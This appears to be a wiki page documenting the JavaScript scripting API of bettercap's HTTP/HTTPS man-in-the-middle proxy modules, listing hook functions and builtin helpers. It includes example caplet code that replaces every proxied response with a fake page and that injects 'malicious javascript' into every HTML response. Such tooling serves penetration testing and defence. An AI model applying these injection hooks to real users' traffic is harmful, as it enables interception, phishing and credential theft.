http.modules - rhaidiz/bettercap GitHub Wiki

The http.proxy and https.proxy modules can be scripted using javascript files that must declare at least one of the following functions:

// called when the script is loaded
function onLoad() {

}

// called when the request is received by the proxy
// and before it is sent to the real server.
function onRequest(req, res) {

}

// called when the request is sent to the real server
// and a response is received
function onResponse(req, res) {

}

// called every time an unknown session command is typed,
// proxy modules can optionally handle custom commands this way:
function onCommand(cmd) {
    if( cmd == "test" ) {
        /*
         * Custom session command logic here.
         */

        // tell the session we handled this command
        return true
    }
}

Modules can change the req request and res response objects, for instance the web-override.cap caplet is using the onRequest function in order to override every request before it is executed with a fake response:

function onRequest(req, res) {
    res.Status      = 200;
    res.ContentType = "text/html";
    res.Body        = readFile("caplets/www/index.html");
    headers         = res.Headers.split("\r\n")
    for (var i = 0; i < headers.length; i++) {
        header_name = headers[i].replace(/:.*/, "")
        res.RemoveHeader(header_name);
    }
    res.SetHeader("Connection", "close");
}

The login-man-abuse.cap caplet instead will use the onResponse handler to inject its malicious javascript file in every html response:

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript">' + "\n" +
                    AbuserJavascript +
                '</script>' +
                '</head>'
            ); 
        }
    }
}

Builtin Functions

Modules can use the following builtin functions.

function description
readFile("/path/to/file") Return the contents of a file as a string.
writeFile("/path/to/file", "hello world") Write the string hello world to a file, returns null or an error message.
log_debug("message") Log a message in the interactive session (its level will be DEBUG).
log_info("message") Log a message in the interactive session (its level will be INFO).
log_warn("message") Log a message in the interactive session (its level will be WARNING).
log_error("message") Log a message in the interactive session (its level will be ERROR).
log_fatal("message") Log a message in the interactive session (its level will be FATAL).
log("message") Shortcut for log_info("message").
btoa("message") Encode a message to base64.
atob("bWVzc2FnZQ==") Decode a message from base64.
env("iface.ipv4") Read a variable.
env("foo", "bar") Set a variable.

bettercap.org | @bettercap | team

⚠️ **GitHub.com Fallback** ⚠️